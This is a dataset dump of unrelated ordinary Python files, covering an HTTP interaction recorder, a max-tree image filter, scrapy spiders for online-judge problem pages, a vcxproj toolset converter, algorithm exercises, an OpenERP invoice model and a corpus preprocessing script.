RecorderHttpHandler.current_recording = InteractionRecording()\n\n def do_GET(self):\n self.process_request(\"\\n\")\n\n def do_POST(self):\n self.process_request_with_body()\n\n def process_request_with_body(self):\n self.process_request(self.rfile.read(int(self.headers['Content-Length'])))\n\n def do_PUT(self):\n self.process_request_with_body()\n\n def process_request(self, request_body):\n new_req_headers = dict(self.headers.items())\n new_req_headers.update({'Host': self.interception.real_service_host()})\n\n response = self.perform_request_on_real_service(new_req_headers, request_body)\n self.send_response(response.status_code)\n self.end_headers()\n self.wfile.write(response.content)\n RecorderHttpHandler.interception.current_recording.add_interaction(\n Interaction(http_verb=self.command,\n request_headers=self.interception.modified_request_headers(new_req_headers),\n request_body=request_body,\n request_path=self.path,\n response_headers=self.interception.modified_response_headers(response),\n response_body=(str(response.content, encoding='utf-8')),\n response_code=response.status_code))\n f = open(MOCKS_DIR + RecorderHttpHandler.invoking_method.replace(\"test_\", '') + \".md\", \"w+\")\n f.write(RecorderHttpHandler.interception.current_recording.to_markdown_string())\n f.close()\n\n def perform_request_on_real_service(self, new_req_headers, request_body):\n if self.command == \"GET\":\n response = requests.request(self.command, RecorderHttpHandler.interception.host + self.path,\n headers=new_req_headers)\n else:\n response = requests.request(self.command, RecorderHttpHandler.interception.host + self.path,\n headers=new_req_headers, data=request_body)\n return response\n\n\ndef set_real_service(host):\n RecorderHttpHandler.interception.host = host\n\n\ndef set_request_header_replacements(replacements):\n RecorderHttpHandler.interception.request_header_overrides = replacements\n\n\ndef set_response_header_removals(removals):\n RecorderHttpHandler.interception.response_headers_to_remove = removals\n\n\ndef start():\n server_address = ('localhost', 61417)\n try:\n httpd = HTTPServer(server_address, RecorderHttpHandler)\n except OSError as e:\n if \"Address already in use\" in str(sys.exc_info()[1]):\n assert False, \"Address 'localhost:61417' is in use already - can't start recorder\"\n raise e\n httpd.serve_forever()\n\n\nif __name__ == \"__main__\":\n start()\n","sub_path":"servirtium/recorder.py","file_name":"recorder.py","file_ext":"py","file_size_in_byte":6172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"26126755","text":"import numpy as np\nfrom copy import copy\nfrom typing import List, Dict\nfrom python_research.preprocessing.attribute_profiles.utils.data_types import Pixel\nfrom python_research.preprocessing.attribute_profiles\\\n .max_tree.attribute_matrix_construction import construct_matrix\nfrom operator import attrgetter\n\n\nIMAGE_DIMS = 2\nIMPLEMENTED_ATTRIBUTES = ['area', 'stddev', 'diagonal', 'moment']\nNOT_PROCESSED = -1\n\n\nclass MaxTree:\n def __init__(\n self, image: np.ndarray,\n attributes_to_compute: List[str] = None\n ):\n if attributes_to_compute is None:\n attributes_to_compute = ['area']\n for attribute in attributes_to_compute:\n if attribute not in IMPLEMENTED_ATTRIBUTES:\n raise ValueError(\n \"Attribute {} is not implemented\".format(attribute)\n )\n if image.ndim != IMAGE_DIMS:\n raise ValueError(\n \"Image should have {} dimensions, not {}\".format(IMAGE_DIMS, image.ndim)\n )\n self.image = image\n self.parent = np.full(image.shape, NOT_PROCESSED, dtype=Pixel)\n self.zpar = np.zeros(image.shape, dtype=Pixel)\n self.s = []\n self.node_index = np.full(image.shape, -1)\n self.attribute_names = attributes_to_compute\n self._build_tree()\n self._compute_nani()\n\n def _get_neighbours(self, pixel: Pixel):\n neighbours = []\n adjacency = [(i, j) for i in (-1, 0, 1) for j in (-1, 0, 1) if not (i == j == 0)]\n for dx, dy in adjacency:\n if 0 <= pixel.x + dx < self.image.shape[1] and 0 <= pixel.y + dy < self.image.shape[0]:\n x = pixel.x + dx\n y = pixel.y + dy\n neighbours.append(Pixel(x, y, self.image[y, x]))\n return neighbours\n\n def _sort_pixels(self):\n image_width = self.image.shape[1]\n for index, pixel_value in enumerate(self.image.flatten()):\n x = index % image_width\n y = int(index / image_width)\n self.s.append(Pixel(x, y, pixel_value))\n\n self.s = sorted(self.s, key=attrgetter('value'))\n\n def _find_root(self, pixel: Pixel):\n parent_pixel = self.zpar[pixel.coords]\n if parent_pixel.coords != pixel.coords:\n self.zpar[pixel.coords] = self._find_root(parent_pixel)\n return self.zpar[pixel.coords]\n\n def _canonize(self):\n for pixel in self.s:\n q = self.parent[pixel.coords]\n q_parent = self.parent[q.coords]\n if self.image[q.coords] == self.image[q_parent.coords]:\n self.parent[pixel.coords] = q_parent\n\n def _build_tree(self):\n self._sort_pixels()\n for pixel in reversed(self.s):\n self.parent[pixel.coords] = pixel\n self.zpar[pixel.coords] = pixel\n for neighbour in self._get_neighbours(pixel):\n if self.parent[neighbour.coords] != NOT_PROCESSED:\n root = self._find_root(neighbour)\n if root != pixel:\n self.zpar[root.coords] = pixel\n self.parent[root.coords] = pixel\n self._canonize()\n\n def _construct_attribute_matrices(self):\n attribute_matrices = dict()\n for attribute in self.attribute_names:\n attribute_matrices[attribute] = construct_matrix(attribute, self.image)\n return attribute_matrices\n\n def _compute_attributes(self):\n sorted_lvroots = []\n nlvroots = 0\n attribute_matrices = self._construct_attribute_matrices()\n for pixel in reversed(self.s):\n for attribute_matrix in attribute_matrices.values():\n attribute_matrix[self.parent[pixel.coords].coords] += attribute_matrix[pixel.coords]\n if (\n self.image[self.parent[pixel.coords].coords] != self.image[pixel.coords] or\n self.parent[pixel.coords] == pixel\n ):\n sorted_lvroots.append(pixel)\n nlvroots += 1\n return sorted_lvroots, nlvroots, attribute_matrices\n\n def _fill_nani(\n self,\n sorted_lvroots: List,\n attribute_matrices: Dict[str, np.ndarray]\n ):\n for index, pixel in enumerate(reversed(sorted_lvroots)):\n self.node_index[pixel.coords] = index\n self.parent_gray_level_relation[index, 0] = self.node_index[\n self.parent[pixel.coords].coords\n ]\n self.parent_gray_level_relation[index, 1] = self.image[pixel.coords]\n for attribute_name in self.attribute_values.keys():\n self.attribute_values[attribute_name][index] = attribute_matrices[\n attribute_name\n ][pixel.coords].get()\n\n def _fill_remaining_positions(self):\n node_index_width = self.node_index.shape[1]\n for index, value in enumerate(self.node_index.flatten()):\n x = index % node_index_width\n y = int(index / node_index_width)\n if self.node_index[y, x] == -1:\n self.node_index[y, x] = self.node_index[\n self.parent[y, x].coords\n ]\n\n def _compute_nani(self):\n sorted_lvroots, nlvroots, attribute_matrices = self._compute_attributes()\n self.parent_gray_level_relation = np.zeros((nlvroots, 2))\n self.attribute_values = {\n attribute_name: np.zeros((nlvroots,)) for attribute_name in self.attribute_names\n }\n self._fill_nani(sorted_lvroots, attribute_matrices)\n self._fill_remaining_positions()\n\n def _define_removed_nodes(self, attribute: str, threshold):\n to_keep = self.attribute_values[attribute] < threshold\n return ~to_keep\n\n def _direct_filter(self, attribute, threshold):\n to_keep = self._define_removed_nodes(attribute, threshold)\n to_keep[0] = True\n parent = copy(self.parent_gray_level_relation[:, 0])\n lut = self._update_parents(parent, to_keep)\n lut = self._update_lut(lut, to_keep)\n node_index = self._update_node_index(lut)\n return node_index\n\n def _update_parents(self, parent, to_keep):\n M = self.parent_gray_level_relation.shape[0]\n nearest_ancestor_kept = [0 for _ in range(0, M)]\n lut = [x for x in range(0, M)]\n for i in range(0, M):\n if not to_keep[i]:\n temp = nearest_ancestor_kept[int(parent[i])]\n nearest_ancestor_kept[i] = temp\n lut[i] = lut[temp]\n else:\n nearest_ancestor_kept[i] = i\n parent[i] = nearest_ancestor_kept[int(parent[i])]\n return lut\n\n def _update_lut(self, lut: List, to_keep: List[bool]):\n M = self.parent_gray_level_relation.shape[0]\n index_fix = [None for _ in range(0, M)]\n index_fix[0] = ~to_keep[0]\n for i in range(1, M - 1):\n index_fix[i] = index_fix[i - 1] + ~to_keep[i]\n lut[i] = lut[i] + index_fix[i]\n return lut\n\n def _update_node_index(self, lut: List):\n image_width = self.node_index.shape[1]\n node_index = copy(self.node_index)\n for index, pixel in enumerate(node_index.flatten()):\n x = index % image_width\n y = int(index / image_width)\n node_index[y, x] = lut[node_index[y, x]]\n return node_index\n\n def _reconstitute_image(self, node_index):\n image = copy(self.image)\n image_width = image.shape[1]\n for index, pixel in enumerate(image.flatten()):\n x = index % image_width\n y = int(index / image_width)\n image[y, x] = self.parent_gray_level_relation[[node_index[y, x]], 1]\n return image\n\n def filter(self, attribute: str, threshold):\n node_index = self._direct_filter(attribute, threshold)\n return self._reconstitute_image(node_index)\n","sub_path":"python_research/preprocessing/attribute_profiles/max_tree/max_tree.py","file_name":"max_tree.py","file_ext":"py","file_size_in_byte":7891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"169206535","text":"import scrapy,re\r\nfrom scrapy.spiders import Spider\r\nfrom scrapy.selector import Selector\r\nfrom datetime import datetime\r\nfrom crawl.items import ProblemItem\r\nfrom lxml import etree\r\n\r\n\r\nclass HduProblemSpider(Spider):\r\n name = 'hdu_problem'\r\n #allowed_domains = ['acm.hdu.edu.cn']\r\n problem_id = '1000'\r\n\r\n def __init__(self, problem_id='1005', *args, **kwargs):\r\n self.problem_id = problem_id\r\n super(HduProblemSpider, self).__init__(*args, **kwargs)\r\n self.start_urls = [\r\n 'http://acm.hdu.edu.cn/showproblem.php?pid=%s' % problem_id\r\n ]\r\n\r\n def parse(self, response):\r\n #print(\"11111111111111111\",type(response.body))\r\n \r\n html = (response.body).decode('gbk','ignore')\r\n sel = Selector(text=html)\r\n\r\n item = ProblemItem()\r\n item['originOj'] = 'HDU'\r\n item['problemId'] = self.problem_id\r\n item['problemUrl'] = response.url\r\n item['title'] = sel.xpath('//h1/text()').extract()[0]\r\n item['desc'] = sel.css('.panel_content').extract()[0]\r\n item['input'] = sel.css('.panel_content').extract()[1]\r\n item['output'] = sel.css('.panel_content').extract()[2]\r\n item['timeLimit'] = \\\r\n sel.xpath('//b/span/text()').re('T[\\S*\\s]*S')[0][12:]\r\n item['memoryLimit'] = \\\r\n sel.xpath('//b/span/text()').re('Me[\\S*\\s]*K')[0][14:]\r\n item['sampleInput'] = sel.xpath('//pre/div/text()').extract()[0]\r\n item['sampleOutput'] = sel.xpath('//pre/div/text()').extract()[1]\r\n item['updateTime'] = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n Ls = sel.xpath('//pre/div/div').extract()\r\n item['note'] = ''\r\n if len(Ls) > 0:\r\n item['note'] = Ls[0]\r\n \r\n return item\r\n\r\n\r\nclass PojProblemSpider(Spider):\r\n name = 'poj_problem'\r\n #allowed_domains = ['acm.hdu.edu.cn']\r\n problem_id = '1000'\r\n\r\n def __init__(self, problem_id='1000', *args, **kwargs):\r\n self.problem_id = problem_id\r\n super(PojProblemSpider, self).__init__(*args, **kwargs)\r\n self.start_urls = [\r\n 'http://poj.org/problem?id=%s' % problem_id\r\n ]\r\n\r\n def parse(self, response):\r\n html = (response.body).decode('gbk','ignore') \r\n sel = Selector(text=html)\r\n\r\n\r\n item = ProblemItem()\r\n item['originOj'] = 'POJ'\r\n item['problemId'] = self.problem_id\r\n item['problemUrl'] = response.url\r\n item['title'] = sel.css('.ptt').xpath('./text()').extract()[0]\r\n item['desc'] = sel.css('.ptx').extract()[0]\r\n item['input'] = sel.css('.ptx').extract()[1]\r\n item['output'] = sel.css('.ptx').extract()[2]\r\n try:\r\n item['timeLimit'] = sel.css('.plm').\\\r\n re('Case\\sT[\\S*\\s]*MS')[0][21:]\r\n except:\r\n item['timeLimit'] = sel.css('.plm').re('T[\\S*\\s]*MS')[0][16:]\r\n item['memoryLimit'] = sel.css('.plm').re('Me[\\S*\\s]*K')[0]\r\n item['sampleInput'] = sel.css('.sio').extract()[0]\r\n item['sampleOutput'] = sel.css('.sio').extract()[1]\r\n item['updateTime'] = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n \r\n item['note'] = ''\r\n \r\n return item\r\n\r\nclass ZojProblemSpider(Spider):\r\n name = 'zoj_problem'\r\n problem_id = '1001'\r\n\r\n def __init__(self, problem_id='1001', *args, **kwargs):\r\n self.problem_id = problem_id\r\n super(ZojProblemSpider, self).__init__(*args, **kwargs)\r\n self.start_urls = [\r\n 'http://acm.zju.edu.cn/onlinejudge/showProblem.do?problemCode=%s' % problem_id\r\n ]\r\n\r\n def getDetail(self,html):\r\n L = len(html)\r\n left = right = cnt = 0\r\n for i in range(0,L-4):\r\n if html[i:i+4] == '
':\r\n cnt = cnt + 1\r\n print(\"find a
\")\r\n if cnt == 2 :\r\n left = i+4\r\n elif cnt == 3:\r\n right = i+1\r\n break\r\n return html[left:right]\r\n\r\n def moreProcess(self,text):\r\n for i in range(0,len(text)):\r\n if text[i] == '>':\r\n return text[i+2:]\r\n\r\n def parse(self,response):\r\n html = (response.body).decode('gbk','ignore')\r\n sel = Selector(text=html)\r\n\r\n item = ProblemItem()\r\n item['originOj'] = 'ZOJ'\r\n item['problemId'] = self.problem_id\r\n item['problemUrl'] = response.url\r\n \r\n item['title'] = sel.css('.bigProblemTitle').xpath('./text()').extract()[0]\r\n item['desc'] = self.getDetail(html)\r\n item['input'] = item['output'] = item['sampleInput'] = item['sampleOutput'] = item['note'] = ''\r\n item['timeLimit'] = self.moreProcess(str(sel.xpath('//center[2]').re('T[\\S*\\s]*s')[0]))\r\n item['memoryLimit'] = self.moreProcess(str(sel.xpath('//center[2]').re('M[\\S*\\s]*B')[0]))\r\n item['updateTime'] = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n yield item\r\n\r\n\r\n\r\nclass FzuProblemSpider(Spider):\r\n name = 'fzu_problem'\r\n #allowed_domains = ['acm.hdu.edu.cn']\r\n problem_id = '1000'\r\n\r\n def __init__(self, problem_id='1000', *args, **kwargs):\r\n self.problem_id = problem_id\r\n super(FzuProblemSpider, self).__init__(*args, **kwargs)\r\n self.start_urls = [\r\n 'http://acm.fzu.edu.cn/problem.php?pid=%s' % problem_id\r\n ]\r\n\r\n def parse(self, response):\r\n html = (response.body).decode('utf-8','ignore')\r\n sel = Selector(text=html)\r\n\r\n item = ProblemItem()\r\n item['originOj'] = 'FZU'\r\n item['problemId'] = self.problem_id\r\n item['problemUrl'] = response.url\r\n item['title'] = sel.xpath(\r\n '//div[contains(@class,\\\r\n \"problem_title\")]/b/text()').extract()[0][14:].rstrip()\r\n item['desc'] = \\\r\n sel.css('.pro_desc').extract()[0].\\\r\n replace('
', '
').\\\r\n            replace('
', '')\r\n try:\r\n item['input'] = sel.css('.pro_desc').extract()[1]\r\n except:\r\n item['input'] = ''\r\n try:\r\n item['output'] = sel.css('.pro_desc').extract()[2]\r\n except:\r\n item['output'] = ''\r\n item['timeLimit'] = \\\r\n sel.css('.problem_desc').re('T[\\S*\\s]*c')[0][12:]\r\n item['memoryLimit'] = \\\r\n sel.css('.problem_desc').\\\r\n re('M[\\S*\\s]*B')[0][15:]\r\n item['sampleInput'] = \\\r\n sel.xpath('//div[@class=\"data\"]/text()').extract()[-2]\r\n item['sampleOutput'] = \\\r\n sel.xpath('//div[@class=\"data\"]/text()').extract()[-1]\r\n item['updateTime'] = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n \r\n item['note'] = ''\r\n \r\n return item\r\n","sub_path":"crawl/crawl/spiders/problem_spider.py","file_name":"problem_spider.py","file_ext":"py","file_size_in_byte":6796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"320445848","text":"import os\nimport glob\ndef v142_141(path):\n\tos.chdir(path)\n\tfiles=glob.glob('*.vcxproj')\n\tfor file in files:\n\t\tfid = open(file,'r')\n\t\tfid2 = open(file+'0','w')\n\t\tlastpt = 0\n\t\tfid.seek(0,0)\n\t\twhile 1:\n\t\t\tline = fid.readline()\n\t\t\tpt = fid.tell()\n\t\t\tif (len(line)==0):\n\t\t\t\tbreak\n\t\t\tloc = line.find('')\n\t\t\tif loc >= 0:\n\t\t\t\tloc1 = line.find('')\n\t\t\t\tif loc1 < 0:\n\t\t\t\t\tprint(' not matched in ' + file + ' !')\n\t\t\t\t\tfid.close()\n\t\t\t\t\treturn\n\t\t\t\tfid2.write(line[0:loc+len('')])\n\t\t\t\ttargetStr = line[loc+len(''):loc1]\n\t\t\t\tif targetStr == 'v142':\n\t\t\t\t\tfid2.write('v141')\n\t\t\t\telse:\n\t\t\t\t\tfid2.write(targetStr)\n\t\t\t\tafter_targetStr = line[loc+len('')+4:len(line)]\n\t\t\t\tfid2.write(after_targetStr)\n\t\t\telse:\n\t\t\t\tfid2.write(line)\n\t\tfid.close()\n\t\tfid2.close()\n\t\tos.remove(file)\n\t\tos.rename(file+'0',file)\n\nv142_141(\"c:\\\\temp\\\\temp\")\n\n\n","sub_path":"vs2019_2017.py","file_name":"vs2019_2017.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"689458","text":"\r\nN = [-20,13,-9,45,9,12,-200,15,40,32,44,43,41]\r\n\r\ndef find_maximum_sum(n):\r\n\r\n max_sum = max(n)\r\n i = j = n.index(max_sum)\r\n\r\n #print(i)\r\n sum = max_sum\r\n\r\n right_index = i+1\r\n if i == len(n)-1:\r\n right_index = len(n)\r\n left_index = 1\r\n\r\n for ind in range(i,0,-1):\r\n sum = sum + n[ind-1]\r\n if (sum >= max_sum):\r\n max_sum = sum\r\n left_index = ind\r\n if left_index == 1:\r\n left_index = i+1\r\n \r\n sum = max_sum\r\n for ind in range(j+1,len(n)):\r\n sum = sum + n[ind]\r\n if (sum > max_sum):\r\n max_sum = sum\r\n right_index = ind+1\r\n\r\n \r\n return(max_sum,left_index,right_index)\r\n\r\ndef find_mid_sum(left_sum,c,left_j,right_j):\r\n sum = left_sum\r\n max_mid_sum = left_sum\r\n mid_max_j = left_j\r\n for y in range(left_j,right_j):\r\n #print(\"c[y] is\", c[y])\r\n sum = sum + c[y]\r\n if sum > max_mid_sum:\r\n max_mid_sum = sum\r\n mid_max_j = y+1\r\n return(max_mid_sum,mid_max_j)\r\n\r\n\r\ndef main():\r\n N=[-20,13,-9,45,9,12,-200,15,40,32,44,43,41]\r\n val = 0\r\n for i in range(0,len(N)):\r\n if N[i] > 0:\r\n val = 1\r\n\r\n\r\n if val == 0:\r\n print(\"All numbers are negative\")\r\n max_sum = max(N)\r\n print(\"Maximal Sub array\",max_sum,\"Index i\",N.index(max_sum)+1,\"Index j\",N.index(max_sum)+1)\r\n exit()\r\n\r\n val = 0\r\n for i in range(0,len(N)):\r\n if N[i] < 0:\r\n val = 1\r\n\r\n\r\n sum = 0\r\n if val == 0:\r\n print(\"All numbers are positive\")\r\n for i in range(0,len(N)):\r\n sum = sum + N[i]\r\n print(\"Maximal Sub array\",sum,\"Index i\",1,\"Index j\",len(N))\r\n exit()\r\n \r\n\r\n length = len(N)\r\n mid_val = round(len(N)/2)\r\n\r\n list1 = N[0:mid_val]\r\n list2 = N[mid_val:length]\r\n\r\n left_max_val,left_i,left_j = find_maximum_sum(list1)\r\n\r\n right_max_val,right_i,right_j = find_maximum_sum(list2)\r\n right_i = right_i + mid_val\r\n right_j = right_j + mid_val\r\n\r\n mid_max_sum,mid_j = find_mid_sum(left_max_val,N,left_j,right_j) \r\n mid_i = left_i\r\n\r\n if max(left_max_val,right_max_val,mid_max_sum)==left_max_val:\r\n print (\"Maximal Sub array\",left_max_val,\"Index i\",left_i,\"Index j\",left_j)\r\n\r\n if max(left_max_val,right_max_val,mid_max_sum)==right_max_val:\r\n print (\"Maximal Sub array\",right_max_val,\"Index i\",right_i,\"Index j\",right_j)\r\n\r\n if max(left_max_val,right_max_val,mid_max_sum)==mid_max_sum:\r\n print (\"Maximal Sub array\",mid_max_sum,\"Index i\",mid_i,\"Index j\",mid_j)\r\n\r\nmain()","sub_path":"Divide_Conquer._Max_Sum_With_Indicespy.py","file_name":"Divide_Conquer._Max_Sum_With_Indicespy.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"494741309","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n# Copyright (c) 2011 OpenERP Venezuela (http://openerp.com.ve)\n# All Rights Reserved.\n# Programmed by: Israel Fermín Montilla \n#\n# WARNING: This program as such is intended to be used by professional\n# programmers who take the whole responsability of assessing all potential\n# consequences resulting from its eventual inadequacies and bugs\n# End users who are looking for a ready-to-use solution with commercial\n# garantees and support are strongly adviced to contract a Free Software\n# Service Company\n#\n# This program is Free Software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n###############################################################################\nfrom openerp.osv import fields, osv\n\nfrom openerp.addons.decimal_precision import decimal_precision as dp\n\n\nclass inherited_invoice(osv.Model):\n\n \"\"\"\n M321 Customizations for account.invoice model\n \"\"\"\n _inherit = \"account.invoice\"\n _columns = {\n 'profit_code': fields.integer(\"Code from profit\",\n help=\"Invoice code from profit\"),\n }\n\n\nclass inherited_invoice_line(osv.Model):\n _inherit = \"account.invoice.line\"\n _columns = {\n 'net_discount': fields.float('Net Discount', required=False,\n digits_compute=dp.get_precision('Account'),\n help=\"\"\"Loaded from data imported from Profit is equal to sale price\n minus real sold price\"\"\"),\n 'discount_code_profit': fields.char('Discount code from profit',\n size=7)\n }\n\n _defaults = {\n 'net_discount': 0.0\n }\n","sub_path":"m321_customization/invoice.py","file_name":"invoice.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"15612565","text":"\ndef calc_divisor(x):\n # O(sqrt(N))\n divisor = []\n for i in range(1, int(x ** 0.5) + 1):\n if x % i == 0:\n divisor.append(i)\n if i != x // i:\n divisor.append(x // i)\n return divisor\n\n\nN = int(input())\nprint(*sorted(calc_divisor(N)), sep=\"\\n\")\n","sub_path":"contest_src/abc180/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"64448882","text":"#!/usr/bin/env python3\n\"\"\"\nPreprocesses the specified corpus. Converters should be put into the\nemLam.corpus package. Currently, converters exist for the Szeged Treebank,\nWebcorpus and MNSZ2.\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\nfrom builtins import range\nfrom argparse import ArgumentParser, RawDescriptionHelpFormatter\nfrom functools import partial\nimport os\nimport os.path as op\nfrom queue import Empty\n\nfrom emLam.corpus import get_all_corpora, get_all_preprocessors\nfrom emLam.corpus.corpus_base import GoldCorpus\nfrom emLam.corpus.preprocessor_base import CopyPreprocessor\nfrom emLam.corpus.gold_to_raw import GoldToRaw\nfrom emLam.utils import run_queued, setup_queue_logger\nfrom emLam.utils.config import cascade_section, handle_errors, load_config\n\n\ndef usage_epilog(corpora, preprocessors):\n \"\"\"Describes the various Corpus and Preprocessor classes available.\"\"\"\n cformat = '{{:<{}}} - {{}}'.format(max(len(name) for name in corpora.keys()))\n pformat = '{{:<{}}} - {{}}'.format(max(len(name) for name in preprocessors.keys()))\n c = '\\nThe following corpora are available:\\n' + '\\n'.join(\n cformat.format(name, cls_path[0].description) for name, cls_path\n in corpora.items())\n p = '\\nThe following preprocessors are available:\\n' + '\\n'.join(\n pformat.format(name, cls_path[0].description) for name, cls_path\n in preprocessors.items())\n return c + '\\n' + p\n\n\ndef config_pp(config, warnings, errors, class_paths):\n \"\"\"\n Postprocessing function for the configuration: makes sure that it has\n sections for the selected corpus and preprocessor. Not all components have\n sections in the configuration; examples include the text corpus and the copy\n preprocessor. However, since properties are inherited from the ancestor\n classes, we need to know their full path later.\n \"\"\"\n for path in class_paths:\n cfg = config\n for section in path:\n cfg = cfg.setdefault(section, {})\n\n\ndef parse_arguments():\n corpora = get_all_corpora()\n preprocessors = get_all_preprocessors()\n\n parser = ArgumentParser(\n description='Preprocesses the specified corpus.',\n formatter_class=RawDescriptionHelpFormatter,\n epilog=usage_epilog(corpora, preprocessors))\n parser.add_argument('--source-dir', '-s', required=True,\n help='the source directory.')\n parser.add_argument('--target-dir', '-t', required=True,\n help='the target directory.')\n parser.add_argument('--corpus', '-c', required=True,\n choices=[c for c in corpora.keys()],\n help='the corpus to preprocess. See below for a '\n 'description of the available corpora.')\n parser.add_argument('--preprocessor', '-p', required=True,\n choices=[p for p in preprocessors.keys()],\n help='the preprocessor to use. See below for a '\n 'description of the available options.')\n parser.add_argument('--configuration', '-C', required=True,\n help='the configuration file.')\n parser.add_argument('--processes', '-P', type=int, default=1,\n help='the number of files to process parallelly.')\n parser.add_argument('--log-level', '-L', type=str, default=None,\n choices=['debug', 'info', 'warning', 'error', 'critical'],\n help='the logging level.')\n\n args = parser.parse_args()\n if args.source_dir == args.target_dir:\n parser.error('Source and target directories must differ.')\n\n args.corpus, corpus_path = corpora[args.corpus]\n args.preprocessor, preprocessor_path = preprocessors[args.preprocessor]\n if (\n issubclass(args.corpus, GoldCorpus) and\n args.preprocessor not in [CopyPreprocessor, GoldToRaw]\n ):\n parser.error(\"Gold standard corpora can only be used with the ``copy'' \"\n \"preprocessor.\")\n\n # Config file\n config, warnings, errors = load_config(\n args.configuration, 'preprocess_corpus.schema',\n retain=[args.corpus.name, args.preprocessor.name],\n postprocessing=partial(config_pp,\n class_paths=[corpus_path, preprocessor_path]))\n handle_errors(warnings, errors)\n\n return args, config\n\n\ndef walk_non_hidden(directory):\n \"\"\"Walks directory as os.walk, skipping hidden files and directories.\"\"\"\n def delete_hidden(lst):\n for i in range(len(lst) - 1, -1, -1):\n if lst[i][0] == '.':\n del lst[i]\n\n for tup in os.walk(directory):\n dirpath, dirnames, filenames = tup\n delete_hidden(dirnames)\n delete_hidden(filenames)\n yield tup\n\n\ndef source_target_file_list(source_dir, target_dir):\n source_dir = op.abspath(source_dir)\n target_dir = op.abspath(target_dir)\n source_files = [op.abspath(op.join(d, f))\n for d, _, fs in walk_non_hidden(source_dir) for f in fs]\n target_files = []\n for sf in source_files:\n sf_rel = sf[len(source_dir):].lstrip(os.sep)\n tf = op.join(target_dir, sf_rel)\n td = op.dirname(tf)\n if not op.isdir(td):\n os.makedirs(td)\n target_files.append(tf)\n return zip(source_files, target_files)\n\n\ndef process_file(components, queue, logging_level=None, logging_queue=None):\n corpus_cls, preprocessor_cls, pid, config = components\n # First set up the logger used by the corpus and the preprocessor\n logger = setup_queue_logger(logging_level, logging_queue)\n\n # Then we can instantiate the objects that do the actual work\n corpus = corpus_cls.instantiate(\n pid, **cascade_section(config, corpus_cls.name))\n logger.debug('Configuration: {}'.format(cascade_section(config, corpus_cls.name)))\n preprocessor = preprocessor_cls.instantiate(\n pid, **cascade_section(config, preprocessor_cls.name))\n preprocessor.initialize()\n try:\n while True:\n try:\n infile, outfile = queue.get_nowait()\n logger.info('Started processing {}'.format(infile))\n for ins, outs in corpus.files_to_streams(infile, outfile):\n preprocessor.preprocess(ins, outs)\n logger.info('Done processing {}'.format(infile))\n except Empty:\n logger.debug('Queue depleted.')\n break\n except:\n logger.exception('Exception in file {}'.format(\n infile))\n preprocessor.cleanup()\n preprocessor.initialize()\n except Exception as e:\n logger.exception('Unexpected exception')\n raise\n finally:\n preprocessor.cleanup()\n\n\ndef main():\n args, config = parse_arguments()\n os.nice(20) # Play nice\n\n components = [(args.corpus, args.preprocessor, p + 1, config)\n for p in range(args.processes)]\n source_target_files = source_target_file_list(args.source_dir, args.target_dir)\n\n run_queued(process_file, components,\n args.processes, source_target_files, args.log_level)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/preprocess_corpus.py","file_name":"preprocess_corpus.py","file_ext":"py","file_size_in_byte":7249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"553067048","text":"# Copyright 2016 Devsim LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom ds import *\nfrom simdir.physics.new_physics import *\nfrom simdir.physics.ramp2 import *\n\nimport numpy as np\n# import matplotlib\nimport matplotlib.pyplot\nfrom matplotlib import pyplot as plt\nimport ds\nECE_NAME = \"ElectronContinuityEquation\"\nHCE_NAME = \"HoleContinuityEquation\"\n#####\n# dio1\n#\n# Make doping a step function\n# print dat to text file for viewing in grace\n# verify currents analytically\n# in dio2 add recombination\n#\ndef get_ds_status():\n devices = ds.get_device_list()\n for device in devices:\n print(\"Device: \" + device)\n regions = ds.get_region_list(device=device)\n for region in regions:\n print(\"\\tRegion :\" + region)\n params = ds.get_parameter_list(device=device, region=region)\n for param in params:\n val = ds.get_parameter(device=device, region=region, name=param)\n print(f\"\\t\\t{param} = {val}\")\n n_models = ds.get_node_model_list(device=device, region=region)\n for node_model in n_models:\n nmvals = ds.get_node_model_values(device=device, region=region, name=node_model)\n print(f\"\\t\\t Node Model '{node_model}' = {nmvals!s}\")\n e_models = ds.get_edge_model_list(device=device, region=region)\n for edge_model in e_models:\n emvals = ds.get_edge_model_values(device=device, region=region, name=edge_model)\n print(f\"\\t\\t Edge Model '{edge_model}' = {emvals!s}\")\n contacts = ds.get_contact_list(device=device)\n for contact in contacts:\n print(\"\\tContact : \" + 